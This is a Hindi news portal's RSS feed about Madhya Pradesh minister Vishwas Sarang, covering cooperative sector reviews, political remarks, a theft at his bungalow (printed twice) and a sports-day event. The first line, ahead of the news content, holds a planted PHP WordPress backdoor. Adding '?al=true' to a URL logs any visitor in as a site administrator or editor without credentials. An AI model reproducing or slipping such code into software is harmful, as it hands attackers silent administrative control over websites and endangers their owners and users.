// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Vishwas Sarang – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 24 Apr 2026 16:00:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 सहकारिता किसानों की आय, तकनीक और विश्वास में बढ़ोतरी का आधार बनी : मंत्री सारंग https://pratyushaashakinayikiran.com/?p=214322 Fri, 24 Apr 2026 16:00:00 +0000 https://pratyushaashakinayikiran.com/?p=214322 भोपाल.
सहकारिता, खेल एवं युवा कल्याण मंत्री विश्वास कैलाश सारंग ने सहकारिता विभाग की समीक्षा बैठक में कहा कि मध्यप्रदेश सहकारिता के क्षेत्र में तेजी से आगे बढ़ते हुए देश के लिए एक आदर्श मॉडल के रूप में उभर रहा है। राज्य में पेक्स के डिजिटलीकरण, व्यवसाय विविधिकरण, सदस्यता विस्तार और दुग्ध संघों की प्रगति ने ग्रामीण अर्थव्यवस्था को नई मजबूती दी है।

पेक्स कम्प्यूटरीकरण में देश में अग्रणी मध्यप्रदेश
मंत्री सारंग ने बताया कि प्रदेश की सभी 4536 कार्यशील पेक्स का सफल कम्प्यूटरीकरण किया जा चुका है। ईआरपी सॉफ्टवेयर के माध्यम से कार्यप्रणाली पारदर्शी और आधुनिक बनी है। किसानों को एसएमएस के जरिए लेन-देन की जानकारी देने में मध्यप्रदेश देश में प्रथम है। साथ ही, ऑनलाइन और पेपरलेस सदस्यता सुविधा से किसानों को सरल और सुगम सेवाएं मिल रही हैं।

व्यवसाय विविधिकरण से बढ़ रही आय
मंत्री सारंग ने बताया कि पेक्स अब पारंपरिक गतिविधियों से आगे बढ़कर नए व्यवसाय अपना रही हैं। आईएफएफसीओ-एमसी आउटलेट, सांची पार्लर, पशुचारा और रिटेल स्टोर जैसे नवाचारों से समितियों की आय में वृद्धि हो रही है। आगामी वर्षों में 1500 से अधिक पेक्स में व्यवसाय विविधिकरण का लक्ष्य रखा गया है।

सदस्यता अभियान से बढ़ेगी भागीदारी
मंत्री सारंग ने कहा कि प्रदेश में वर्तमान में 58 लाख से अधिक सदस्य हैं, जबकि 41 लाख नए सदस्य बनाने की अपार संभावनाएं हैं। इसी को ध्यान में रखते हुए 10 लाख नए सदस्य बनाने का अभियान संचालित किया जा रहा है। इस अभियान से किसानों को शून्य प्रतिशत ब्याज पर फसल ऋण, सस्ती कृषि सामग्री और सरकारी योजनाओं का लाभ मिलेगा।

दुग्ध संघों में ऐतिहासिक प्रगति
मंत्री सारंग ने बताया कि एनडीडीबी के साथ हुए समझौते के बाद प्रदेश में दुग्ध उत्पादन और संग्रहण में उल्लेखनीय वृद्धि हुई है। दूध उत्पादकों को समयबद्ध भुगतान सुनिश्चित किया गया है और उनकी आय में भी वृद्धि हुई है। नए डेयरी प्लांट और बल्क मिल्क कूलर की स्थापना से डेयरी क्षेत्र को नई गति मिली है।

सहकारिता से आत्मनिर्भरता की ओर
मंत्री सारंग ने कहा कि सहकारिता के माध्यम से किसानों, महिलाओं और ग्रामीण समाज को आर्थिक रूप से सशक्त बनाया जा रहा है। मध्यप्रदेश सरकार का उद्देश्य सहकारिता को जन-जन तक पहुंचाकर प्रदेश को आत्मनिर्भर बनाना है। बैठक में प्रमुख सचिव सहकारिता डी.पी. आहूजा, उपसचिव रानी बाटड़, प्रबंध संचालक अपैक्स बैंक मनोज गुप्ता, प्रबंध संचालक राज्य सहकारी संघ ऋतुराज रंजन, प्रबंध संचालक बीज निगम महेंद्र दीक्षित सहित अन्य वरिष्ठ अधिकारी उपस्थित रहे। 

]]>
यूसीसी पर मंत्री विश्वास सारंग का बयान, बोले- देश में एकरूपता जरूरी, कांग्रेस पर कसा तंज https://pratyushaashakinayikiran.com/?p=211129 Wed, 08 Apr 2026 11:39:00 +0000 https://pratyushaashakinayikiran.com/?p=211129 भोपाल 

समान नागरिक संहिता (यूसीसी) को लेकर मध्यप्रदेश सरकार के मंत्री विश्वास सारंग ने बड़ा बयान दिया है। उन्होंने कहा कि देश में एकरूपता लाने के लिए एक समान कानून जरूरी है, जिससे हर नागरिक का भविष्य सुरक्षित हो सके। मंत्री सारंग ने कहा कि वर्तमान और आने वाली पीढ़ियों के बेहतर भविष्य के लिए यह जरूरी है कि सभी नागरिकों पर एक जैसा कानून लागू हो। उन्होंने जोर देकर कहा कि कानून में जाति और धर्म के आधार पर कोई भेदभाव नहीं होना चाहिए और सभी के लिए समान व्यवस्था होनी चाहिए।  

कांग्रेस जाति और धर्म में बांटने की राजनीति करती है 
उन्होंने कांग्रेस पर निशाना साधते हुए आरोप लगाया कि पार्टी ने हमेशा विभाजन की राजनीति की है। कांग्रेस ने जाति और धर्म के आधार पर समाज को बांटकर तुष्टिकरण की राजनीति की और अल्पसंख्यकों को केवल वोट बैंक के रूप में इस्तेमाल किया। मंत्री ने कहा कि वर्तमान सरकार पिछली गलतियों को सुधारने का प्रयास कर रही है। उन्होंने दावा किया कि यूसीसी लागू होने से देश में एकरूपता आएगी, विकास को गति मिलेगी और सभी नागरिकों के लिए समान अवसर सुनिश्चित होंगे। 

किसानों के गेंहू का एक-एक दाना खरीदा जाएगा 
मंत्री ने गेहूं उपार्जन को लेकर कहा कि सरकार किसानों के प्रति पूरी तरह प्रतिबद्ध है। किसानों के गेहूं का एक-एक दाना खरीदा जाएगा। किसी तरह की कोई समस्या या संशय नहीं है। उन्होंने कांग्रेस पर गेहूं खरीदी को लेकर भ्रम फैलाने का आरोप लगाया। उन्होंने कहा कि किसानों की पूरी फसल को सरकार खरीदेंगी। वहीं, मंत्री ने सहकारिता चुनाव को लेकर कहा कि प्रदेश में सहकारिता चुनाव जल्द पूरे किए जाएंगे। उन्होंने कहा कि चुनाव प्रक्रिया पहले से जारी है, कहीं कोई रोक नहीं हैं। सरकार सहकारी आंदोलन को मजबूत करने के लिए प्रतिबद्ध हैं। मंत्री ने कहा कि मोहन सरकार का चुनाव के जरिए संस्थाओं को और सक्रिय बनाने पर जोर हैं।  

]]>
मंत्री विश्वास सारंग के सरकारी बंगले में चोरी, प्रशस्ति पत्र और मेडल गायब, सुरक्षा पर उठे सवाल https://pratyushaashakinayikiran.com/?p=210646 Mon, 06 Apr 2026 11:39:00 +0000 https://pratyushaashakinayikiran.com/?p=210646 भोपाल 

मध्य प्रदेश की राजधानी भोपाल से एक चौंकाने वाली खबर सामने आई है, जिसने प्रशासनिक व्यवस्था और वीआईपी सुरक्षा पर गंभीर सवाल खड़े कर दिए हैं। खेल मंत्री विश्वास सारंग के सरकारी आवास में चोरों ने सेंध लगा दी। चोरों ने आवास के स्टोर रूम का ताला तोड़कर अंदर रखे मेडल और प्रशस्ति-पत्र उठा ले गए। यह घटना 3 अप्रैल की बताई जा रही है। खुलासा होते ही पुलिस महकमे में हड़कंप मच गया और मामला दर्ज कर आरोपियों की तलाश शुरू कर दी गई। 

जानकारी के अनुसार, मंत्री विश्वास सारंग के सरकारी बंगले पर यह वारदात हुई। टीटी नगर पुलिस ने बंगले के आसपास लगे सीसीटीवी कैमरों की फुटेज खंगालनी शुरू कर दी है। प्रारंभिक जांच में पुलिस को आशंका है कि साफ-सफाई या अन्य काम के बहाने बंगले में आने-जाने वाले किसी बाहरी व्यक्ति का इस चोरी में हाथ हो सकता है। सुरक्षा व्यवस्था की भी समीक्षा की जा रही है।

यह घटना इसलिए भी संवेदनशील मानी जा रही है क्योंकि यह एक वीआईपी इलाके में हुई, जहां सुरक्षा व्यवस्था अन्य क्षेत्रों की तुलना में कहीं अधिक कड़ी रहती है। मंत्री आवास में इस तरह की चोरी ने पुलिस की कार्यप्रणाली और सुरक्षा इंतजामों की पोल खोल दी है। पुलिस अभी सभी पहलुओं की जांच कर रही है और जल्द ही आरोपियों की गिरफ्तारी का दावा किया जा रहा है।

सबसे हैरानी की बात यह है कि चोर बेखौफ अंदाज़ में वारदात को अंजाम देकर निकल गए और किसी को इसकी भनक तक नहीं लगी. जिस बंगले की सुरक्षा में गार्ड तैनात हों, वहां इस तरह की घटना होना कई सवाल खड़े करता है. यह मामला सिर्फ चोरी का नहीं, बल्कि सुरक्षा व्यवस्था में बड़ी सेंध का संकेत माना जा रहा है। 

घटना के बाद सुरक्षा गार्ड ने टीटी. नगर थाना में इसकी शिकायत दर्ज कराई है. पुलिस ने मामला दर्ज कर जांच शुरू कर दी है. आसपास लगे सीसीटीवी कैमरों की फुटेज खंगाली जा रही है ताकि चोरों की पहचान की जा सके. पुलिस संदिग्धों की तलाश में जुटी हुई है और हर एंगल से जांच की जा रही है। 

पुलिस ने मामला दर्ज कर जांच शुरू की
इस घटना के बाद आम लोगों के बीच भी चिंता का माहौल है. जब एक मंत्री का बंगला सुरक्षित नहीं है, तो आम नागरिकों की सुरक्षा को लेकर सवाल उठना लाजमी है. फिलहाल पुलिस का दावा है कि जल्द ही आरोपियों को पकड़ लिया जाएगा. इस घटना ने एक बार फिर राजधानी की सुरक्षा व्यवस्था को कटघरे में खड़ा कर दिया है। 

पुलिस के अनुसार, मंत्री विश्वास सारंग के बंगले से ट्रॉफियां, मोमेंटो, शील्ड और प्रशस्ति-पत्र चोरी हुए हैं। स्टोर रूम में सीसीटीवी कैमरे नहीं लगे होने के कारण पुलिस को आरोपियों की शिनाख्त में परेशानी हो रही है। 

]]>
मंत्री विश्वास सारंग के सरकारी बंगले में चोरी, प्रशस्ति पत्र और मेडल गायब, सुरक्षा पर उठे सवाल https://pratyushaashakinayikiran.com/?p=210647 Mon, 06 Apr 2026 11:39:00 +0000 https://pratyushaashakinayikiran.com/?p=210647 भोपाल 

मध्य प्रदेश की राजधानी भोपाल से एक चौंकाने वाली खबर सामने आई है, जिसने प्रशासनिक व्यवस्था और वीआईपी सुरक्षा पर गंभीर सवाल खड़े कर दिए हैं। खेल मंत्री विश्वास सारंग के सरकारी आवास में चोरों ने सेंध लगा दी। चोरों ने आवास के स्टोर रूम का ताला तोड़कर अंदर रखे मेडल और प्रशस्ति-पत्र उठा ले गए। यह घटना 3 अप्रैल की बताई जा रही है। खुलासा होते ही पुलिस महकमे में हड़कंप मच गया और मामला दर्ज कर आरोपियों की तलाश शुरू कर दी गई। 

जानकारी के अनुसार, मंत्री विश्वास सारंग के सरकारी बंगले पर यह वारदात हुई। टीटी नगर पुलिस ने बंगले के आसपास लगे सीसीटीवी कैमरों की फुटेज खंगालनी शुरू कर दी है। प्रारंभिक जांच में पुलिस को आशंका है कि साफ-सफाई या अन्य काम के बहाने बंगले में आने-जाने वाले किसी बाहरी व्यक्ति का इस चोरी में हाथ हो सकता है। सुरक्षा व्यवस्था की भी समीक्षा की जा रही है।

यह घटना इसलिए भी संवेदनशील मानी जा रही है क्योंकि यह एक वीआईपी इलाके में हुई, जहां सुरक्षा व्यवस्था अन्य क्षेत्रों की तुलना में कहीं अधिक कड़ी रहती है। मंत्री आवास में इस तरह की चोरी ने पुलिस की कार्यप्रणाली और सुरक्षा इंतजामों की पोल खोल दी है। पुलिस अभी सभी पहलुओं की जांच कर रही है और जल्द ही आरोपियों की गिरफ्तारी का दावा किया जा रहा है।

सबसे हैरानी की बात यह है कि चोर बेखौफ अंदाज़ में वारदात को अंजाम देकर निकल गए और किसी को इसकी भनक तक नहीं लगी. जिस बंगले की सुरक्षा में गार्ड तैनात हों, वहां इस तरह की घटना होना कई सवाल खड़े करता है. यह मामला सिर्फ चोरी का नहीं, बल्कि सुरक्षा व्यवस्था में बड़ी सेंध का संकेत माना जा रहा है। 

घटना के बाद सुरक्षा गार्ड ने टीटी. नगर थाना में इसकी शिकायत दर्ज कराई है. पुलिस ने मामला दर्ज कर जांच शुरू कर दी है. आसपास लगे सीसीटीवी कैमरों की फुटेज खंगाली जा रही है ताकि चोरों की पहचान की जा सके. पुलिस संदिग्धों की तलाश में जुटी हुई है और हर एंगल से जांच की जा रही है। 

पुलिस ने मामला दर्ज कर जांच शुरू की
इस घटना के बाद आम लोगों के बीच भी चिंता का माहौल है. जब एक मंत्री का बंगला सुरक्षित नहीं है, तो आम नागरिकों की सुरक्षा को लेकर सवाल उठना लाजमी है. फिलहाल पुलिस का दावा है कि जल्द ही आरोपियों को पकड़ लिया जाएगा. इस घटना ने एक बार फिर राजधानी की सुरक्षा व्यवस्था को कटघरे में खड़ा कर दिया है। 

पुलिस के अनुसार, मंत्री विश्वास सारंग के बंगले से ट्रॉफियां, मोमेंटो, शील्ड और प्रशस्ति-पत्र चोरी हुए हैं। स्टोर रूम में सीसीटीवी कैमरे नहीं लगे होने के कारण पुलिस को आरोपियों की शिनाख्त में परेशानी हो रही है। 

]]>
विश्वास सारंग का तंज: जनमत का मखौल उड़ाने से कांग्रेस को हुआ नुकसान, दिग्विजय और राहुल गांधी पर निशाना https://pratyushaashakinayikiran.com/?p=191936 Mon, 17 Nov 2025 12:38:00 +0000 https://pratyushaashakinayikiran.com/?p=191936 भोपाल 

मध्य प्रदेश के कैबिनेट मंत्री विश्वास सारंग ने कांग्रेस पर बड़ा हमला किया है, उन्होंने कहा कि बिहार की जनता के फैसले को कांग्रेस नेताओं को स्वीकार करना चाहिए और आत्मचिंतन करना चाहिए, जनमत को स्वीकार करना हर राजनीतिक दल का कर्तव्य है। उन्होंने राहुल गांधी और दिग्विजय सिंह पर भी निशाना साधा।

मध्य प्रदेश के पचमढ़ी में पिछले दिनों आयोजित  किये गए प्रशिक्षण शिविर के बाद अब कांग्रेस संगठन में कसावट लाने का प्रयास कर रही है, कांग्रेस परफोर्मिंग और नॉन परफोर्मिंग नेताओं पर फोकस करने वाली है, भाजपा ने कांग्रेस के एक्शन पर ताना मारा है, कैबिनट मंत्री विश्वास सारंग ने कांग्रेस नेताओं को अपने अंदाज में नसीहत दी है।

मीडिया से बात करते हुए विश्वास सारंग ने कहा नॉन परफोर्मिंग नेताओं की लिस्ट यदि कांग्रेस बनाने लगेगी तो उसके बहुत से नेताओं के नाम निकलेंगे इसलिए मुझे लगता है कि छोटे कार्यकर्ताओं पर चाबुक चलाने से अच्छा है कि कांग्रेस बड़े नेताओं पर अनुशासन लागू करे, राहुल गांधी स्वयं अनुशासित और संयमित हों, वे अपनी आचार संहिता का ध्यान रखें, राजनीति के सिद्धांतों का पालन करें।

BJP की नक़ल करने के लिए अक्ल भी चाहिए 

सारंग ने कहावो कांग्रेस जो देश को समाप्त करने की कोशिश करती है वो कांग्रेस जो जाति और धर्म की आड़ लेकर इस देश में वैमनस्य फैलाती है उस कांग्रेस के नेताओं को स्वयं अपने गिरेबां में झांकना चाहिए और अपने आचरण के  बारे में विचार करना चाहिए, उन्होंने कहा भाजपा की नक़ल कांग्रेस कर रही है तो उसमें उसे अक्ल भी लगानी चाहिए।

कार्यकर्ताओं की जगह नेताओं का प्रशिक्षण जरूरी 

राहुल गांधी के पचमढ़ी टूर पर तंज कसते हुए सारंग ने कहा, राहुल गांधी राहुल कार्यकर्ताओं को प्रशिक्षण देने आये थे जबकि उस समय बिहार में चुनाव चल रहे थे वे अपना भाषण खत्म कर जंगल घूमने चले गए, उनमें गंभीरता की कमी है, इसलिए कांग्रेस की स्थिति बद से बदतर है, मुझे लगता है कार्यकर्ताओं के प्रशिक्षण से पहले कांग्रेस के नेताओं को  प्रशिक्षण दिया जाना चाहिए।

दिग्विजय सिंह और राहुल गांधी पर साधा निशाना 

विश्वास सारंग ने कहा कि भारतीय जनता पार्टी की बुराई करते करते दिग्विजय सिंह, राहुल गांधी और अन्य नेता चुनाव आयोग पर पहुंच जाते हैं और चुनाव आयोग से हटकर जनता को गाली देने लगते हैं, जनमत का इस तरह से मखौल उउड़ाना ही कांग्रेस को गर्त में जाने का बड़ा कारण है, लोकतंत्र में जनता जो फैसला देती है उसको शिरोधार्य करना, स्वीकार करना हर राजनीतिक दल का कर्तव्य है, जनता ने यदि एनडीए को प्रचंड बहुमत से जिताया है तो कांग्रेस नेताओं को जनता के फैसले को सिर झुकाकर स्वीकार करना चाहिए।

अपने घर आंगन को संवारने की कोशिश करे कांग्रेस  

सारंग ने कहा नाच ना आंगन टेढ़ा, खिसियानी बिल्ली खम्बा नोचे वाली कहावतों को चरितार्थ कर कांग्रेस नेता फिर गलती कर रहे हैं बिहार की जनता ने अपने स्वविवेक से एनडीए को चुना है। विश्वास सारंग ने कहा जिस पार्टी का नेता नहीं, नीति नहीं, नीयत नहीं उसका यही हाल होगा, इसलिए दूसरों को गाली देने की जगह अपने घर आंगन को संवारने की कोशिश करेंगे तो उसका सही परिणाम निकल पायेगा।

]]>
हर खिलाड़ी बनेगा फिटनेस का ब्रांड एंबेसेडर, 10–10 नागरिकों को प्रेरित करने का लें संकल्प : खेल मंत्री सारंग https://pratyushaashakinayikiran.com/?p=181697 Sat, 30 Aug 2025 03:46:00 +0000 https://pratyushaashakinayikiran.com/?p=181697 खिलाड़ियों को दिलाई फिट इंडिया शपथ

राष्ट्रीय खेल दिवस पर मंत्री सारंग ने मेजर ध्यानचंद को पुष्पांजलि अर्पित की

भोपाल 

हॉकी के जादूगर मेजर ध्यानचंद की 120वीं जयंती राष्ट्रीय खेल दिवस पर खेल एवं युवा कल्याण मंत्री विश्वास कैलाश सारंग ने तात्या टोपे स्टेडियम भोपाल में आयोजित कार्यक्रम में मेजर ध्यानचंद को पुष्पांजलि अर्पित की। उन्होंने कहा कि हॉकी के जादूगर, ‘पद्म भूषण’ मेजर ध्यानचंद ने विश्व हॉकी में भारत का परचम लहराया है। उनका जीवन साहस, अनुशासन और खेल भावना का अद्वितीय उदाहरण है, जो सदैव हम सभी को प्रेरित करता रहेगा। मंत्री सारंग ने खिलाड़ियों को फिट इंडिया की शपथ भी दिलाई।

प्रधानमंत्री मोदी के नेतृत्व में खेलों के प्रति बना सकारात्मक माहौल

मंत्री सारंग ने कहा कि प्रधानमंत्री नरेंद्र मोदी के नेतृत्व में देशभर में खेलों का अभूतपूर्व विकास हुआ है। फिट इंडिया मूवमेंट और खेलो इंडिया जैसे अभियानों ने हर आयु वर्ग में खेल और फिटनेस के प्रति नई जागरूकता पैदा की है। खिलाड़ियों को विश्वस्तरीय प्रशिक्षण सुविधाएँ उपलब्ध कराई जा रही हैं, जिससे वे अंतरराष्ट्रीय स्तर पर उत्कृष्ट प्रदर्शन कर रहे हैं। आज भारत एशियाई खेलों, कॉमनवेल्थ और ओलंपिक जैसी प्रतियोगिताओं में ऐतिहासिक सफलताएँ हासिल कर रहा है और गाँव–गाँव तक खेल संस्कृति को नई पहचान मिल रही है।

नंबर 1 पर पहुंचना हमारा लक्ष्य

मंत्री सारंग ने कहा कि पहले के समय में खेल को ज्यादा महत्व नहीं दिया जाता था। प्रदेश में अत्याधुनिक अधोसंरचना, विभिन्न खेलों की अकादमी, प्रशिक्षित प्रशिक्षक और अन्तरराष्ट्रीय स्तर की खेल सुविधाओं के कारण आज मध्यप्रदेश शीर्ष 3 राज्यों में शामिल हो चुका है। अब हमारा लक्ष्य है कि प्रदेश को देश का नंबर 1 खेल राज्य बनाया जाए। इसके लिये बेहतर व्यवस्थाओं के साथ ही स्कूल–कॉलेज स्तर से प्रतिभाओं की पहचान कर उन्हें अंतरराष्ट्रीय स्तर तक पहुँचाने की ठोस योजना पर कार्य हो रहा है। मंत्री सारंग ने कहा कि खिलाड़ियों की मेहनत और सरकार के संकल्प से मध्यप्रदेश जल्द ही भारत का अग्रणी खेल राज्य बनेगा।

हर खिलाड़ी 10 लोगों को खेल व फिटनेस के लिये प्रेरित करें

मंत्री सारंग ने खिलाड़ियों से आहवान किया कि वे सिर्फ मैदान तक सीमित न रहें, बल्कि समाज में खेल और फिटनेस के ब्रांड एंबेसडर बनें। उन्होंने कहा कि प्रत्येक खिलाड़ी अगले तीन माह में अपने आसपास के कम से कम 10 लोगों को खेल और फिटनेस की ओर प्रेरित करे। ये लोग परिवारजन, पड़ोसी, मित्र या छात्र भी हो सकते हैं। उन्होंने कहा कि यदि खिलाड़ी नागरिकों को खेल और फिटनेस से जोड़ेंगे, तो यह एक जनआंदोलन का रूप लेगा। उन्होंने कहा कि खिलाड़ी न केवल पदक जीतकर बल्कि समाज को स्वस्थ और जागरूक बनाकर भी देश की सेवा करते हैं। जब हर घर से कोई न कोई खेलों से जुड़ेगा, तभी भारत ‘फिट इंडिया’ और ‘हिट इंडिया’ बन पाएगा।

’एक घंटा खेल मैदान में’ के तहत रस्साकशी में लिया भाग

‘एक घंटा खेल मैदान में’ थीम के तहत मंत्री सारंग ने खिलाड़ियों एवं प्रशिक्षकों के साथ रस्साकशी में भी भाग लिया। इस अवसर पर म.प्र. वॉटर स्पोर्ट्स व हॉकी टीम के खिलाड़ियों के बीच भी रस्साकशी का मैत्री मैच हुआ, जिसमें 2-1 से म.प्र. वॉटर स्पोर्ट्स की टीम विजेता रही। मंत्री सारंग ने स्टेडियम में 100 मीटर स्प्रिंट पुरुष व महिला, फुटबॉल, पॉल वॉल्ट समेत अन्य खेलों का अवलोकन कर खिलाड़ियों से संवाद किया तथा उनका उत्साहवर्धन किया।

मार्शल आर्ट अकादमी का किया भ्रमण

राष्ट्रीय खेल दिवस के अवसर पर मंत्री सारंग ने टीटी नगर स्टेडियम स्थित मार्शल आर्ट अकादमी का भ्रमण किया। यहां उन्होंने रेसलिंग, बॉक्सिंग व फेंसिंग खेलों का अवलोकन किया एवं उपलब्ध सुविधाओं का जायजा लिया। कार्यक्रम में खेल एवं युवा कल्याण के उप-सचिव अजय श्रीवास्तव, संचालक राकेश गुप्ता, संयुक्त संचालक बी.एस. यादव सहित विभागीय अधिकारी उपस्थित रहे।

31 अगस्त तक प्रदेश में होंगे खेल आयोजन

राष्ट्रीय खेल दिवस के तीन दिवसीय कार्यक्रम के तहत 30 अगस्त को सुबह 11:30 बजे नर्मदा क्लब में खेल विषयक विशेष सेमिनार आयोजित किया जा रहा है। जिसमें स्पोर्ट्स इंजरी, साइकोलॉजी एवं एंटी-डोपिंग जागरूकता जैसे महत्वपूर्ण विषयों पर विशेषज्ञ मार्गदर्शन देंगे। इसके बाद दोपहर 3 बजे बिचारपुर और सरदारपुर की महिला टीमों के बीच फुटबॉल मैच खेला जाएगा।

तीसरे दिन 31 अगस्त को सुबह 7:30 बजे राजधानी भोपाल में “संडे ऑन साइकिल” रैली का आयोजन होगा, जो राजा भोज सेतु से प्रारंभ होकर वॉटर स्पोर्ट्स अकादमी पर खत्म होगी।

 

]]>
मध्यप्रदेश की सभी पैक्स डब्ल्यू.डी.आर.ए. की सदस्य बनेंगी – विश्वास सारंग https://pratyushaashakinayikiran.com/?p=181498 Fri, 29 Aug 2025 06:36:00 +0000 https://pratyushaashakinayikiran.com/?p=181498 मध्यप्रदेश की सभी पैक्स डब्ल्यू.डी.आर.ए. की सदस्य बनेंगी – विश्वास सारंग

सहकारी संस्थाओं के व्यवसाय विविधीकरण पर राज्य स्तरीय कार्यशाला सम्पन्न

भोपाल
अपेक्स बैंक के समन्वय भवन में भांडागारण विकास और विनियामक प्राधिकरण (डब्ल्यू.डी. आर.ए.) के माध्यम से सहकारी संस्थाओं के व्यवसाय विविधीकरण पर अपेक्स बैंक, सहकारिता विभाग एवं विनियामक प्राधिकरण के संयुक्त तत्वावधान में एक राज्य स्तरीय कार्यशाला को सम्बोधित करते हुए मध्य प्रदेश के सहकारिता तथा खेलकूद एवं युवा कल्याण मंत्री श्री विश्वास कैलाश सारंग ने कहा कि हमारी अर्थव्यवस्था से गांव व किसान को जोड़ने की दिशा में माननीय प्रधानमंत्री जी ने जो जन-धन योजना भारत में लागू किया था, उसका मुख्य उद्देश्य गाॅंव व किसान को देश की अर्थव्यवस्था से जोड़ना था, जिसके सकारात्मक परिणाम आज सामने आ रहे हैं और हमारा देश माननीय प्रधानमंत्री श्री नरेन्द्र मोदी जी के नेतृत्व में एवं केन्द्रीय सहकारिता मंत्री श्री अमित शाह जी के मार्गदर्शन में निरन्तर ’’सहकार से समृद्धि’’ के मूल-मंत्र को साकार करने की दिशा में अग्रसर है ।  इसका अनुसरण करते हुये मध्यप्रदेश में हम स्वर्णिम मध्यप्रदेश के संकल्प के साथ मुख्यमंत्री श्री मोहन यादव जी के नेतृत्व में भी नवाचार के विभिन्न माध्यमों का प्रयोग करते हुये प्रदेश की प्रगति के लिये काम कर रहे हैं । 

श्री सारंग ने कहा कि मेरा मानना है कि जब तक अर्थव्यवस्था आम आदमी के दरवाजे से नहीं निकलेगी, तब तक मजबूत नहीं होगी ।  इसलिये यदि हम किसानों को सुदृढ़ करना चाहते हैं तो पहले हमें पैक्स (प्राथमिक कृषि सहकारी समितियों) को समृद्ध बनाने की दिशा में प्रयास करना होंगे और आज की यह कार्यशाला निश्चित रूप से ’’मील का पत्थर’’ साबित होगी ।  मैं आज अत्यन्त आभारी हॅूं डब्ल्यू.आर.डी.ए. के सदस्य श्री अनूप श्रीवास्तव का, आयुक्त सहकारिता श्री मनोज पुष्प का, स्टेट वेयर हाउसिंग के प्रबंध संचालक श्री अनुराग वर्मा का और सेंट्रल वेयर हाउसिंग कॉर्पोरेशन के क्षेत्रीय प्रबंधक श्री राम कुमार का, जिनके अथक प्रयासों से आज सहकारिता के शीर्ष सभागार में मध्यप्रदेश के सहकारी आन्दोलन से जुड़ा प्रत्येक अधिकारी व सदस्य लाभान्वित हुआ है।  

श्री सारंग ने कहा कि मैं उपस्थित जिला बैंक के मुख्य कार्यपालन अधिकारियों से अपेक्षा करता हॅूं कि वे मध्यप्रदेश की प्रत्येक पैक्स को डब्ल्यू.आर.डी.ए. (भांडागारण विकास और विनियामक प्राधिकरण) का सदस्य बनाने के प्रयास आज से ही प्रयास आरंभ कर दें, जिससे कि आगे चलकर प्रदेश के किसानों को दूरदराज अंचलों में परेशान न होना पड़े व अपने नजदीकी डब्ल्यू.आर.डी.ए. के सदस्य वेयर हाउस में अपनी उत्पाद को सुरक्षित रख लाभान्वित हों, क्योंकि जब तक भण्डारण व्यवस्थित नहीं होगी, तब तक किसानों को उसका फायदा नहीं मिल सकेगा । 

कार्यशाला में श्री सारंग ने अपेक्स बैंक द्वारा प्रकाशित मानक परिचालन प्रक्रिया वेयर हाउसिंग डेव्हलेपमेंट एण्ड रेग्यूलेटरी अथाॅरिटी की योजनान्तर्गत वेयर हाउस पंजीकरण की पुस्तक का विमोचन भी किया तथा प्रदेश में गोदाम बनाने की योजना पर कार्य करने हेतु स्टेट वेयर हाउसिंग प्रबंध संचालक श्री अनुराग वर्मा, म.प्र.राज्य सहकारी संघ के प्रबंध संचालक श्री रितुराज रंजन तथा सहकारिता विभाग के नवाचार प्रकोष्ठ के संयुक्त आयुक्त श्री महेन्द्र दीक्षित को अधिकृत किया।

आयुक्त सहकारिता एवं पंजीयक श्री मनोज पुष्प ने कहा कि अन्तर्राष्ट्रीय सहकारिता वर्ष के दौरान हम किसानों को प्रशिक्षित करें कि वे अपने उत्पाद को कैसे बेहतर ढंग से रख सकते हैं और डिजीटली किस प्रकार बेच सकते हैं, आज की यह कार्यशाला एग्रो प्रोसेसिंग व मार्केंटिंग की दिशा में अत्यन्त उपयोगी है । उन्होंने कहा कि यदि आवश्यक हुआ तो इस प्रकार की कार्यशाला हम संभाग व जिला स्तर पर भी आयोजित करेंगे ।

कार्यशाला में श्री अरूण कुमार श्रीवास्तव, सदस्य, डब्ल्यू.डी. आर.ए. ने कहा कि 2051 तक हमारे देश की जनसंख्या 170 करोड़ हो जायेगी व मध्यप्रदेश की लगभग 12 करोड़, जो देश का लगभग 6.3 होगी ।  म.प्र. का खाद्यान्न उत्पादन लगभग 338 लाख मी.टन है, जो भारत के खाद्यान्न उत्पादन का लगभग 12.10 प्रतिषत है ।  भारत 2051 तक दुनिया की सबसे बड़ी अर्थव्यवस्था बन जायेगा ।  मैं अनुरोध करना चाहता हॅूं कि इस मान से प्रदेश में वेयर हाउस के गोदामों के लिये एक सुनियोजित योजना बनाने की दिशा में प्रयास किये जायें ।

श्री रामकुमार, क्षेत्रीय प्रबंधक, सी.डब्ल्यू.सी. ने बताया कि यदि केन्द्रीय वेयर हाउसिंग में डब्ल्यू.डी.आर.ए. के अन्तर्गत देश के 50 हजार गोदाम यदि रजिस्टर्ड हो जायें तो किसान आपके द्वार तक आ जायेंगे । इससे आपकी साख भी बढ़ेगी और किसान के साथ आप भी हमारी योजनाओं का लाभ उठा सकेंगे, क्योंकि हमारा उद्देश्य वेयर हाउस केन्द्रों को लाभ का केन्द्र बनाना है ।  इससे किसानों के उत्पाद सुरक्षित होंगे और किसी भी प्रकार की धोखाधड़ी से भी बचा जा सकता है ।

कार्यशाला में श्री विनीत गुप्ता, नेषनल ई-रिपोजिटरी लिमिटेड, श्री जसवीर गोदारा, एवीपी सीसीआरएल, श्री संजय अग्रवाल, अपना गोदाम ने अपनी डिजीटल व्यवसाय प्रणाली पर विचार व्यक्त किये । 

कार्यशाला का संचालन अपेक्स बैंक के प्राचार्य श्री पी.एस.तिवारी एवं श्री महेन्द्र दीक्षित, संयुक्त आयुक्त ने किया एवं आभार प्रदर्शन अपेक्स बैंक के प्रबंध संचालक श्री मनोज गुप्ता ने किया । 

कार्यशाला मध्यप्रदेश के सहकारिता विभाग के संयुक्त/उप/सहायक आयुक्तगण, जिला बैंकों के मुख्य कार्यपालन अधिकारीगण, वेयर हाउस व एफपीओ के प्रतिनिधिगण के साथ विभिन्न सहकारी संस्थाओं के वरिष्ठ अधिकारीगण उपस्थित हुए

]]>
